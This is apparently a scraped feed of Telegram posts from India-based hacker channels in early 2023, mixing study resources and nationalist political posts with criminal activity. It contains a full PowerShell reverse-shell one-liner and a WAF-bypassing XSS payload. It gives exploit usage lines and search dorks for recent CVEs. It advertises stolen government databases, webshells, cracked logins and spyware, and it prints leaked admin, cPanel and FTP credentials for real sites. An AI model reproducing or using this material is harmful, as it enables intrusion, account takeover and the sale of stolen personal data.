2023-04-28 09:24:37
DHCP Server Service Remote Code Execution VulnerabilityCVE-2023-28231 POC Download
2023-04-28 07:12:13
Opportunity Update : We are in search of Talented Guys who have skillset of : Making Crypters : Making FUD Trojans : Doing Reverse Engineering : Making Decompilers Dm or send your Resume to asap .________INDIANS ONLY...
2023-04-27 16:25:23
🛡 𝘾𝙡𝙞𝙘𝙠𝙟𝙖𝙘𝙠𝙞𝙣𝙜 & 𝘾𝙤𝙣𝙩𝙚𝙣𝙩 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮 🛡Clickjacking Tool, Script are given in Description. 𝙋𝙡𝙚𝙖𝙨𝙚 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏𝙇𝙞𝙣𝙠 :
2023-04-27 11:46:50
2023-04-27 11:23:43
private sector database ✪1 week  10$2 week 20$1 month 50$
2023-04-27 08:22:16
2023-04-27 06:13:28
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: No Rate Limit𝙇𝙞𝙣𝙠:𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏
2023-04-27 01:43:08
ComboList Wordpress Fucker(BETA Version) 🖕
2023-04-26 16:03:59
2023-04-26 15:29:20
Come On Vc
2023-04-26 09:51:59
This movie will open the eyes of millions of Hindu girls.#TheKeralaStory
2023-04-25 17:05:06
2023-04-25 15:30:54
2023-04-25 13:20:15
CVE-2023-1671 | Pre-Auth RCE in Sophos Web ApplianceDorkfofa(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance:错误请求"ZoomEyetitle:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"Shodantitle:"Sophos Web Appliance"Usage:python -u http://www.example.compython -u -d xxxxxx.dnslog.cnpython -f urls.txtpython -f urls.txt -d xxxxxx.dnslog.cnDownload:
2023-04-25 11:58:18
CVE-2023-27524: Apache Superset Auth Bypass💥 Script to check if an Apache Superset server is running with an insecure default configuration (CVE-2023-27524). The script checks if a Superset server's session cookies are signed with any well-known default Flask SECRET_KEYs.The --validate flag can be used to validate exploitability by enumerating databases using the Superset [-h] --url URL [--id ID] [--validate] [--timeout TIMEOUT]Download:
2023-04-25 11:53:23
2023-04-25 11:08:53
2023-04-25 10:32:20 OFF Coupon : CCSP-AWS-VNM-100Certified Cloud Security Practitioner–AWS(CCSP-AWS) £100.00AWS-CCSP 100% OFF Exam by The SecOps Group📢Want a 100% discount code on our newly launchedCertified Cloud Security Practitioner - AWS (CCSP-AWS) exam?
2023-04-25 08:09:49
httpXXX:// #CypherRAT Images
2023-04-24 16:08:35
Difference between IPv4 and IPv6⛨ Follow : @HackingInsights
2023-04-24 14:06:38
"Pakistani Army don't have capacity to fight India. Our Tanks can't move, we have no fuel"Pakistani journalist Hamid Mir makes sensational revelations in TV interview, says Gen Bajwa justified surrender on Kashmir, said Pak had no fuel for her battle tanks. Bajwa also said, Pakistan Army can't fight India.
2023-04-24 11:59:19
🆘 INTEL 🆘Anti-Indian hackers are into claims to have hacked major Indian government organizations in various Telegram and Social Media Groups, but they seem to lack the actual hacking skills to do so. Nonetheless, Individuals associated with these govt organizations remain vulnerable to being hacked if they download samples containing third-Grade hacking applications from the posts of these hackers. These samples are deliberately designed to compromise the security of the government organizations when samples are opened.This is strongly advised that the samples of organisation should not be downloaded by any individual of any organisations. भारत-विरोधी हैकर विभिन्न टेलीग्राम और सोशल मीडिया समूहों में प्रमुख सरकारी संगठनों को हैक करने का दावा करते हैं, लेकिन ऐसा करने के लिए उनके पास वास्तविक हैकिंग कौशल की कमी है। बहरहाल, इन सरकारी संगठनों से जुड़े व्यक्ति हैक होने की चपेट में रहते हैं, अगर वे इन हैकर्स के सोशल मीडिया पोस्ट से थर्ड-ग्रेड हैकिंग एप्लिकेशन वाले नमूने डाउनलोड करते हैं सैंपल के नाम पर।डेटा-नमूने खोले जाने पर इन नमूना डेटा को जानबूझकर सरकारी संगठनों की सुरक्षा से समझौता करने के लिए डिज़ाइन किया गया है।यह दृढ़ता से सलाह दी जाती है कि नकली हैकर संगठन के डेटा नमूने किसी भी भारतीय संगठन के किसी भी व्यक्ति द्वारा डाउनलोड नहीं किए जाने चाहिए।Kid's will be kiddo only, Grow up kiddo's & learn Hacking.
2023-04-24 11:44:06
💥 This PoC for CVE-2023-27350 uses an authentication bypass vulnerability chained with abuse of builtin scripting functionality to execute code.Usage:python3 --url '' --command calc.exeDownload:
2023-04-24 10:55:30
Pentagon papers
2023-04-24 07:10:13
2023-04-24 05:49:02
😮‍💨 Sale full access to database sitehttps://tangerangselatankota.go.idIn case of purchase, access to database is also given 😮‍💨 🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄➡️ username,realname,password,telephon🔵 Total database :5,202 💰Price:200$Payment : BTC 🪙 , ETH 🪙 , USDT 🪙📱For Buy @Hajit00n🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄 Images
2023-04-24 04:51:18
𝐑𝐞𝐠𝐢𝐬𝐭𝐞𝐫 𝐍𝐨𝐰👉 ┃ private sector database ✪📌  private channel sharing monetary 📌 private  and free  tools in the field of hacking 📌  crack 📌  carding  📌  combo 📌 account 📌  config 📌leecher📌 king of database allrounder 📌 logs courses📌 👍😁private sector database ✪1 week  10$2 week 20$1 month 50$Life time 100$payment method only btc and upiEscrow accepted@INDIANOSINT
2023-04-24 04:42:53
2023-04-23 09:53:34
Here is a suprise for you all!I'm going to share premium courses of geeks for geeks, coding ninjas and others for free in my second channel as if I'll share here then due to copyright issues this channel will get deleted by telegram.Join if you want premium courses for free
2023-04-22 09:05:13
Best channel for free hacking tools. There's also a private channel for more advanced tools.😎just dm the admin @pwng0d
2023-04-21 08:09:02
*Jinhe voucher buy krna ho eLearnSecurity ka wo abhi kr lena with $100 discount*Voucher Code Post Me Mil Jayega 😊😊
2023-04-21 05:47:59
For those who are feeling low, listen this🔥
2023-04-21 03:19:18
Learn SQL from Squid Game!An interesting way to learn SQL 🤩⛨ Follow : @HackingInsights
2023-04-20 16:09:04
New video is out check it out 👇🏻
2023-04-20 07:33:20
History of Coding Language⛨ Follow : @HackingInsights Images
2023-04-20 00:09:02 airport web is currently offline!!Credits to @keralacyberxtratorsFu*ked by your own daddy-India!And remember what are you before make fun of some one and dont say that these websites are only available in Pakistan and all other ips are blocked💀😂Haha🤣let's seee😏#UnitedByOneDividedByZero#UnitedIndianHackers#TEAM_ANON_101#IndianCyberForce#DarknetAssociation#KeralaCyberXtractors#NewWorldHactivist#IndianCyberMafia#BlackDragonSecurity#IndianCyberTroops#AnonymousIndia#IndianCyberPwnage#UnknownCyberCult
2023-04-19 02:50:05
👉CAN A.I HELP HACKERS TO INCREASE THE CYBERSECURITY THREATS??👈⭕️  (AI)-driven ChatGPT is being used by cyber criminals to develop malicious tools that can steal your data, a report has warned. ⭕️  The first such instances of cybercriminals using ChatGPT to write malicious codes have been spotted by Check Point Research (CPR) researchers.⭕️  In underground hacking forums, threat actors are creating "info stealers", and encryption tools and facilitating fraud activity. ⭕️  The researchers warned of the fast-growing interest in ChatGPT by cybercriminals to scale malicious activity. ⭕️  "Cybercriminals are finding ChatGPT attractive. Hackers starting to use it to write malicious code. ⭕️  ChatGPT has the potential to speed up the process for hackers by giving them a good starting point.⭕️  Do you think Artifical Intelligence can be a threat for human beings??⛨ Follow : @HackingInsights
2023-04-18 19:58:57
g's hacker's ( its a bad day for me but —❤️ ‼️Here we go again FORENSIC Log-based Detection of keystroke injection BadUSB Attacks 💕this is a malware Defence paper for USB attacks like 'ruberducky',As always #hacker_bano_chutiya_nhe 🐆🐆
2023-04-18 16:30:32
2023-04-18 11:58:50
🧑‍💻 Legion Wp-login Combo Cracker 😈😏 Crack Wordpress login Very Fast 💰 Price : 100$👉 DM Buy @Hajit00n
2023-04-18 11:58:38
😈 County Government of Kirinyaga HACKED! 😈 😁:🤚: Images Images
2023-04-18 11:58:31
💎Government😈 (Mexico)Electoral Court of the State of Guerrero HACKED! 😈 😁:🤚: Access: @Hajit00n Images
2023-04-18 11:58:24
💎Government⭐️😈 Otuzco Provincial Municipality HACKED! 😈 😁: 🤚 Images
2023-04-18 11:58:09
💎 Government😈 Ombudsman of the City of Tandil HACKED! 😈 😁:💸 Price : 150$🛒 Payment : BTC , ETH , USDT , TRON 🧑‍💻 Buy Shell : @Hajit00n Images
2023-04-18 06:56:54
15 Best Ethical Hacking Tools 🧰 • Wireshark• NMAP• Burp Suite• Metasploit• Nikto• Intruder• Aircrack-Ng• Nessus• Acunetix• SQLMap• Angry IP Scanner• QualysGuard• Invicti• OpenVAS• ettercap⛨ Follow : @HackingInsights
2023-04-17 15:05:48
2023-04-17 13:28:38
Free Web Application Pentesting Tools• Cyver Core • Zed Attack Proxy• W3af• Arachni• Wapiti• Metasploit• Vega• Grabber• SQLMap• Ratproxy • Wfuzz⛨ Follow : @HackingInsights
2023-04-17 11:36:48
COBALT STRIKE :- WINDOWS💻 POST EXPLOITATION⚡️By @Devil_AnonO.s :- Kali 💻Tool (Official website) :- CobaltstrikeTool :- C¥B€R H€LL PVT MembersWhat is windows post exploitation ❔Windows Post-exploitation refers to any actions taken after a session is opened. A session is an open shell from a successful exploit or bruteforce attack. A shell can be a standard shell or Meterpreter. Share➡️ and support😀@cyberhellcommunity
2023-04-17 11:19:12
Studying Active Directory?Here are 5 blogs you should definitely check out.1. #ethicalhacking #learningeveryday #infosec #cybersec #activedirectory
2023-04-17 11:18:36
Here are some of the free websites to learn Linux from for free :1. OverTheWire[]2. Linux Journey[]3. Linux Handbook[]4. Tecmint[]5. Linux Hint[]6. LinuxOPsys[]7. Linuxize[]8. Eduonix Learn Linux From Scratch[]9. Cyberciti Bash Shell Scripting Tutorial[]10. Learn Enough Command Line To Be Dangerous[]11. The Debian Administrator's Handbook[]12. LabEx Linux For Noobs[]13. nixCraft[]14. Conquering the Command Line[]15. FOSS Linux[]16. It's FOSS[]17. Linux Survival[]18. Ryan's Tutorials[]19. TLDP Advanced Bash Scripting Guide[]20. Guru99 Linux Tutorial Summary[]#pentesting #ethicalhacking #cybersecurity #learningeveryday #infosec #cybersec
2023-04-17 11:15:43
Here is an updated list of free cybersecurity certifications you can get to kickstart your career in cybersecurity :1. Introduction to Cybersecurity[]2. Cybersecurity Essentials[]3. Introduction to Dark Web, Anonymity, and Cryptocurrency[]4. Ethical Hacking Essentials (EHE)[]5. Networking Essentials[]6. Website Hacking Techniques[]7. Digital Forensics Essentials (DFE)[]8. Network Defense Essentials (NDE)[]9. Android Bug Bounty Hunting: Hunt Like a Rat[]10. Certified in Cybersecurity℠ - CC[]11. 20+ Free AWS Certs Related to Cybersecurity[]12. Cyber crime:[]13. Cyber Forensics:[]14. Network Security:[]#infosec #cybersecurity #pentesting #ethicalhacking #informationsecurity #learningeveryday #networksecurity
2023-04-16 18:08:20
🕉️ DogeRat Premium Subscription Available 🕉️⭐ New Features ⭐🕉️ Screenshot🕉️ Keylogger🕉️ Gallery🕉️ Clipboard🕉️New File Manager -------------------------And many features,check in video 🕉️ New features Added🕉️ Bug fixed🕉️ Persistence (work after removing from background or restarting the phone🕉️ Smooth connection client to Bot🙏 @shivaya_dav
2023-04-16 01:22:38
2023-04-15 17:56:06
SALEIndonesian X company's Windows Servers For sale (Only In Indian 2 Rupee & ONLY for India govt ID holders & Australian Defence Personals)- FULL COMPANY ACCESS. (You can co-relate brand to TOYOTA)- Network Access to Equivalent Departments & joint ventures.- A Separate Application Framework to Bind your Exploits into company APK, IPA Applications, You Can release the malformed application for Indonesian public from servers anytime in few seconds.- Guarantee of Persistence access, even buyers loose the access upto 5years. Only in 2 Rupee, Interested ones can email at Pakistan's ex foreign minister work email, I will receive your Request. Regards pkg
2023-04-15 17:30:23
2023-04-15 17:26:24
Old but gold (beginners)
2023-04-15 14:33:20
💥Chrome actively exploited 0-day vulnerability (CVE-2023-2033: type confusion in V8 engine, here fix)🤙Thx @hosselot Images
2023-04-15 13:01:00
🛒Sale government website databasehttps://bpjs-kesehatan.go.idNumber of 800 thousand database columns🛒 Payment : BTC , ETH , USDT 🛒 For Buy: @Hajit00n Images Images Images Images Images
2023-04-15 12:43:17
✅ FOR SALE ✅💎 Paser District Government Official Portal➡️➡️➡️➡️💰 Price : 100$🛒 Payment : BTC , ETH , USDT 🛒 For Buy: @Hajit00n
2023-04-14 20:01:08
2023-04-14 15:29:38
2023-04-14 08:00:24
⭐️ Shodan Search Engine Account For Sell 📐 number of available accounts is 10$350 per month on the site itself price of each account is $100We sell 10 accounts for only $500🧑‍💻 For Buy DM @Hajit00n Images Images
2023-04-14 06:27:57
🔟 Python certifications to boost your resume in 2023𝟭. 𝗜𝗻𝘁𝗿𝗼 𝘁𝗼 𝗣𝘆𝘁𝗵𝗼𝗻This a great course to get started with learning Python, if you have no coding experience.👉𝟮. 𝗣𝘆𝘁𝗵𝗼𝗻 𝗣𝗿𝗼𝗴𝗿𝗮𝗺𝗺𝗶𝗻𝗴 𝗰𝗼𝘂𝗿𝘀𝗲Learn the fundamentals like functions, loops, conditional statements, etc of the most important language for data science.👉𝟯. 𝗣𝗿𝗼𝗴𝗿𝗮𝗺𝗺𝗶𝗻𝗴 𝗘𝘀𝘀𝗲𝗻𝘁𝗶𝗮𝗹𝘀 𝗶𝗻 𝗣𝘆𝘁𝗵𝗼𝗻Part 1 prepares you for PCEP – Certified Entry-Level Python Programmer Certification.Part 2 prepares you for PCAP – Certified Associate in Python Programming Certification.👉𝟰. Python Data Structure and Algorithms👉𝟱. 𝗦𝗰𝗶𝗲𝗻𝘁𝗶𝗳𝗶𝗰 𝗖𝗼𝗺𝗽𝘂𝘁𝗶𝗻𝗴 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You'll learn Python fundamentals like variables, loops, conditionals, and functions. Then you'll quickly ramp up to complex data structures, networking, relational databases, and data visualization.👉𝟲. 𝗗𝗮𝘁𝗮 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You'll learn how to read data from sources like CSVs and SQL, and how to use libraries like Numpy, Pandas, Matplotlib, and Seaborn to process and visualize data.👉𝟳. 𝗗𝗮𝘁𝗮 𝗩𝗶𝘀𝘂𝗮𝗹𝗶𝘇𝗮𝘁𝗶𝗼𝗻 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You will learn how to implement the graphical representation of data in order to interactively and efficiently convey insights to clients, customers, and stakeholders in general.👉𝟴. 𝗠𝗮𝗰𝗵𝗶𝗻𝗲 𝗟𝗲𝗮𝗿𝗻𝗶𝗻𝗴 𝘄𝗶𝘁𝗵 𝗣𝘆𝘁𝗵𝗼𝗻You will build several neural networks and explore more advanced techniques like natural language processing and reinforcement learning.👉 Practice Python👉 Free Python course by datacamp👉 LEARNING 👍👍          Join for more✖️ @HackingInsights ✖️
2023-04-13 13:46:08
How To Find deleted Youtube Videos:
2023-04-13 12:10:17
Arey bhaijaan a Lahore ke electric ko kay hua. 🙂
2023-04-13 02:59:58
Porkiyo ko Do diya
2023-04-13 02:59:44
Afghans fighting Pakistanis in an Indian restaurant in England.Interestingly in UK..most restaurants with Indian Name are opened by Pakistanis.
2023-04-12 18:30:26
2023-04-12 14:24:08
2023-04-12 12:48:16
🔫 2K Turkiye Goverment Login Access 🏴‍☠️ ✅ Payment BTC - ETH - USDT (trc20)👉 For Buy: @Hajit00n 👺 Images
2023-04-12 12:44:58
Fresh 3K Saudi Arabia Data For Sell 🔥👉 For Buy: @Hajit00n 👺
2023-04-12 05:19:47
Bug Reports 🥬☘️ & Bug bounty Guide 🌿🎯🍀1)Attacker is able to query Github repositories of arbitrary Shopify Hydrogen Users Story of Becoming a Super Admin to Bypass XSS Filters: A Practical Example Vulnerability Types Beginner’s Guide to Bug Hunting and Exploiting Common WordPress Vulnerabilities Is Open Source Intelligence (OSINT) In the Context of Bug Bounty you spot the vulnerability? #16022023 — Intigriti Encryption: Understanding Its Advantages and Limitations in Cyber Security | 2023 cryptocurrency through bug bounties Reports 🥬☘️ & Bug bounty Guide 🌿🎯🍀 ☝️☝️
2023-04-11 18:10:22
gg's hacker's ( good afternoon — ‼️Here we go again Certified PENetration Testing professional (CPENT) update link #hacker_bano_chutiya_nhe 💕
2023-04-11 14:28:49
⚡️Pakistan :-Blast in Balochistan, four killed including two policemen, 18 injured The blast occurred near a police vehicle parked in the Kandhari market in the Shahrah-e-Iqbal area of ​​the provincial capital Quetta.No group has claimed responsibility for the attack.🔺@AngrySaffron
2023-04-11 14:08:02
🇸🇪🇵🇰⚡️- Sweden has shut down its embassy in Pakistan
2023-04-11 13:35:01
👉BEWARE OF THESE FAKE INSTAGRAM JOB PAGES!!👈⭕️  In December, a job posting on Instagram piqued the woman’s interest. When she followed the link, she was taken to another Instagram account, @airlinejoballindia. She was instructed to fill out this form with her information, which included her contact details.⭕️  After she completed the form, she received a call from a man named Rahul. She was initially requested to pay a pittance of Rs 750 to register. However, as time went on, she was asked to send additional funds for gate pass fees, insurance, security deposits, and other expenses. ⭕️  The woman became concerned when the demand for money continued even after she sent Rs 8.6 lakh.⭕️  The woman’s husband then reported the incident to Central Delhi police. Following an investigation, authorities revealed that most money withdrawals were conducted in Hisar, Haryana. Rahul’s calls to the woman were also traced to the same address. After confirming all data, the police team raided and apprehended the fraudster.⭕️  The culprit admitted to investigators that he misled several people by promising them employment with private airlines. He began doing this when the perpetrator was jobless for more than two years due to the pandemic, as per a TOI report.          Join for more✖️ @HackingInsights ✖️
2023-04-11 13:02:31
Also Working In WIN 11 Without Detection
2023-04-11 12:49:30
Part2 Turkiye Goverment Access Added VIP💎
2023-04-11 12:42:22
Turkiye Goverment Access Added VIP💎
2023-04-11 07:03:57
2023-03-30 01:07:34 data above 👆
2023-03-30 01:07:33
2023-03-30 01:07:26
2023-03-30 01:07:08
2023-03-30 01:07:07
2023-03-30 01:07:06
2023-03-29 18:50:42
2023-03-29 17:21:58
Pakistan Ministry Of Defence have been robbed.Defence Deal of China-Pakistan for 20 J-10CE & 240 PL-15E Missiles is displayed for your reference.
2023-03-29 16:37:08
2023-03-29 14:24:24
FTP Username: server: & explicit FTPS port: 21FTP pass : IndianCyberPwnage@w3b_1nj3c70r
2023-03-29 13:51:41
☢️ FOR SALE🚨 X1000 Wordpress Login 💎☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:100$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆➖➖➖➖➖➖➖➖➖➖ Images
2023-03-29 13:41:47
🔥 Free Access (Uploader) 💎🧑‍💻 @LegionLeaker
2023-03-29 11:24:29
🚨 FOR SALE☢️➖➖➖➖➖➖➖➖➖➖🪙Domain: & .id⭐️ ▶️ ▶️ ⭐️ ☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:60$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆
2023-03-29 03:21:29
None Images
2023-03-29 02:26:50
🚨 Viewers Discretion is Adviced 🇵🇰Reportedly 1 woman lost life and many injured in the rush to buy flour in Sahiwal Park, while the condition of three to four women is said to be critical : Local media Location: Sahiwal - Pakistan
2023-03-28 10:09:45
2023-03-28 09:40:21
A truck carrying ‘atta’ / flour is looted in Peshawar, Pakistan.But according to alleged factchecker Mohd. Zubair - India ranks 126th on the World Happines Index, while Pakistan is at 108 in the same
2023-03-28 08:44:28
2023-03-28 07:29:47
databse creddentions of Bangladesh police'I{0e$b{05CA{'
2023-03-28 06:52:54 😈Social Media Marketing Hacks at one place😁 Images
2023-03-28 06:34:04
Security Fucker🎨Hacking Site Hacked 😐grow th hacking bites 😈 Images
2023-03-28 02:45:41
pakcricknews 😂 Images
2023-03-28 02:30:29
Pakistan Documents LeakedThe information isn't really useful for novice users but could be usefulFor some registration purposedownload: Images
2023-03-28 02:21:05
📣-Welcome To Our Group VIP-💎➖➖➖➖➖➖➖➖➖➖💰-Price -25$ - ➖➖➖➖➖➖➖➖➖➖➡️ Shells Method & Paid Exploits➡️ Exploits - Leaked & Paid➡️ Stealers Logs - Fresh ➡️ ComboList - Leads - Mail Access ➡️ New Scampages 2022 - Priv8 ➡️ Tools useful for your work ➡️ Laravel - WordPress Exploits ➡️ cPanels - Mailers - Smtps➡️ Method Making Wordpress & Laravel Sites ➖➖➖➖➖➖➖➖➖➖ 🔛 Payment BTC ⚡️ JOIN NOW - @Hajit00n 🎨➖➖➖➖➖➖➖➖➖➖
2023-03-28 02:19:06
✅FOR SALE✅🛒Hacking Tools🛒Banking Logs🛒 Webshells🛒Laravel list🛒Wordpress list🛒 Email's List✅FOR SALE✅🛒 For Buy: @Hajit00n
2023-03-28 02:15:01
✅ sell Hight DA ⚡️💰 Price: 50$🛒 For Buy: @Hajit00n
2023-03-28 02:10:10
PK Admin 😈 admin:Karachi@2018 Admin:eph123* admin:@EcoSet@11@ admin:koppy123@7872 admin:stone@real786 Tana786:@Tahzeeb@pret11 admin:cPF*xi!(3ILt&CdzrzJ Sayyam:Yag9WavA9bK#sovP admin:natsolar@admin admin-adeel:mTqU2)Gwg9k0NjveO8%CeWm) admin:$P$BfOAXfmzVYq1lo rechargmayor567:Pc(4!4BHLeWeZ%FJGwI2Ji$W@Hajit00n
2023-03-28 00:50:32
PK cpanel 😈 wwwsarcocom:QpBx*hwiJU}# | Domains: 1 | freshtogo:cx80GgCs23 | Domains: 2 | | freshtogo.pk | Domains: 0 | natsolar:Q6g*6a67PsGn#Y | Domains: 2 | |
2023-03-28 00:46:40 🤘😈卩ro 爪Cracker 😂❤️
2023-03-28 00:26:21
💥How we broke PHP, hacked Pornhub and earned $20,000tl;dr:💾We have gained RCE on and have earned a $20,000 bug bounty on Hackerone.💾We have found two UAF vulns in PHP’s GC algorithm.💾Those vulnerabilities were remotely exploitable over PHP’s unserialize function.💾We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone). Images Images Images
2023-03-27 13:59:08 collection all rounder databaseShare now
2023-03-27 07:59:01 can join this channel
2023-03-26 13:57:51
ADVANCE FOOTPRINTING SESSION FOR BEGINNERS ✌️BY - @x_cyanide_x TIME - 26 march(TODAY) at 7 :30 PMOUR WEBSITE - system32.inkONLY ON THIS DISCUSSION GROUP👇👇👇@cyberdemonsD#happyhacking
2023-03-26 12:01:19
2023-03-26 04:15:42
Mission Successful 🇮🇳🇮🇳🇮🇳
2023-03-25 19:18:23
🎈 happy Birthday Sir @MCracker2002 🎈आप आशावाद और कड़ी मेहनत के अवतार हैं।💕 हमें हर दिन प्रेरित करने के लिए धन्यवाद। 💕जन्मदिन 🎂 की शुभकामना गुरुजी @MCracker2002
2023-03-25 17:41:41
Hello guys I made a crypto hacking class how to 1.hack how to generate seed 2.brute forces of crypto seed 3.blockchain transaction finder 4.seed grabber 5.tron private key finder 12 phrases + 1 6.NFT seed grabber 7.Trust wallet Seed grabber 8.ledger and cold wallet Grabber8.brain flayer cracking 9.crypto phishing 10. Development of cold and hot wallet 11.cracking wallet.dat files @alex14324
2023-03-25 09:07:24
🍭 Free useful resources to learn Machine Learning 🍭👉 Google👉 Leetcode👉 Hackerrank👉 FreeCodeCamp👉 Kaggle👉 Geeksforgeeks👉 Create ML Models👉 Machine Learning Test Cheat Sheet━ POSTED BY @iishantt ━ 
2023-03-24 20:46:20
2023-03-24 14:42:37
2023-03-24 12:51:10
Remote unauthenticated system and cloud takeover found in major AI tool March 24, 2023 at 05:24PM by FlyingTrianglevia reddit
2023-03-24 12:31:31
2023-03-24 09:36:15
|Pwn2Own Vancouver 2023 - Day One Results|💥 STAR Labs was able to execute a 2-bug chain against Microsoft SharePoint. They earn $100,000 and 10 Master of Pwn points💥 Bien Pham from Qrious Security used an OOB Read and a stacked-based buffer overflow to exploit Oracle VirtualBox. He earns $40,000 and 4 Master of Pwn points.💥 Synacktiv was able to execute their TOCTOU attack against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and a Tesla Model 3.💥STAR Labs successfully executed their attack against Ubuntu Desktop, but the exploit was previously known. They still earn $15,000 and 1.5 Master of Pwn points.💥 Marcin Wiązowski used an improper input validation bug to elevate privileges on Windows 11. He earns $30,000 and 3 Master of Pwn points.💥 Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points.
2023-03-23 11:23:04
2023-03-23 09:48:21
2023-03-22 15:49:54
Join our group for Cyber security
2023-03-22 15:30:07
#USEFUL SITES TO USE ON (Some Links Not Up To Date)BROWSER FINGERPRINT TESThttps://panopticick.eff.org LICENSE GENERATORhttps://www.elfqrin.com LEAK TESTdnsleaktest.com OFFICE PHONE CODEShttps://www.allareacodes.comSMS VERIFICATIONSmspool.net PHONEhttps://www.spooftel.com / AGENT CHECKERhttp://whatsmyuseragent.comFAX SENDER UDEMY COURSEShttps://www.zapcourses.comhttps://www.freshersgold.comCUSTOM/FAKE RECEIPT MAKER VALIDATORhttp://www.ssnvalidator.comSSN DECODER CHECKER SEARCHhttp://www.feinsearch.comhttps://www.einfinder.comhtp:// RDP ACCEPTING BITCOINıxdedicvhnguh5s6k.onion/SSN/DOB SEARCHhttps://ssndob.cchttps://robocheck.cmMMN AUTOSEARCHarchives.comancestry.comBACKGROUND CHECKhttp://www.intelius.comhttp://checkmate.comhttp://equifax.comhttp://thatsthem.comhttps://www.mylife.com REPORThttps://www.quizzle.com➖➖➖➖➖➖➖➖➖➖
2023-03-22 12:21:51
💥"Actual" image recovery:1️⃣Take a JPEG image2️⃣Make a copy of it3️⃣Crop it in Snipping Tool4️⃣Save/overwrite4️⃣In a hex editor, overwrite the EOI Marker (0xFFD9)5️⃣Repair it at http://jpg.repair6️⃣Wonder how secure your cropped image data is Images
2023-03-22 03:17:24
Mitigating SSRF in 2023 March 21, 2023 at 08:03PM by l_tennantvia reddit
2023-03-21 00:48:07
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//> i.e. instead of the standard XSS payload to execute js Images
2023-03-21 00:44:38
2023-03-20 21:34:00
Join our group for more such Cyber security
2023-03-20 18:23:09
A video on Digital ForensicsVolatilityA video on Digital Forensics
2023-03-20 13:22:49
💥Shannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (NrSmMsgCodec as it’s called in Shannon according to debug strings), when decoding the “Extended protocol configuration options” message (IEI = 0x7B).The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to 255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.🔖An “Extended protocol configuration options” message that triggers the overflow is provided in epco-reserved-poc.dat.
2023-03-19 08:10:13
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.Stupid backdoor!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
2023-03-18 14:01:17
2023-03-18 11:57:53
Federal agents of U.S. law enforcement arrested on Wednesday have arrested Conor Brian Fitzpatrick, a Peekskill, New York resident, who allegedly operated the infamous dark web data breach site, "BreachForums." The site, which hosted stolen databases from nearly 1,000 companies and websites, has been a significant player in the cybercrime ecosystem.Fitzpatrick, who went by the online alias "Pompompurin," was charged with a single count of conspiracy to commit access device fraud. BreachForums offered stolen personal information, including names, emails, and passwords, for sale to users. These databases were often used for fraudulent activities. Fitzpatrick's arrest took place at his home, where he admitted to using the alias "Pompompurin" and operating BreachForums.In an affidavit filed with the District Court for the Southern District of New York, FBI Special Agent John Langmire said that at around 4:30 p.m. on March 15, 2023, he led a team of law enforcement agents that made a probable cause arrest of a Conor Brian Fitzpatrick in Peekskill, NY.#stay safe while hacking "ethically"#Focus on your OPSEC Images
2023-03-18 11:24:41
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
2023-03-18 04:29:32
2023-03-17 13:53:18
2023-03-17 10:47:05
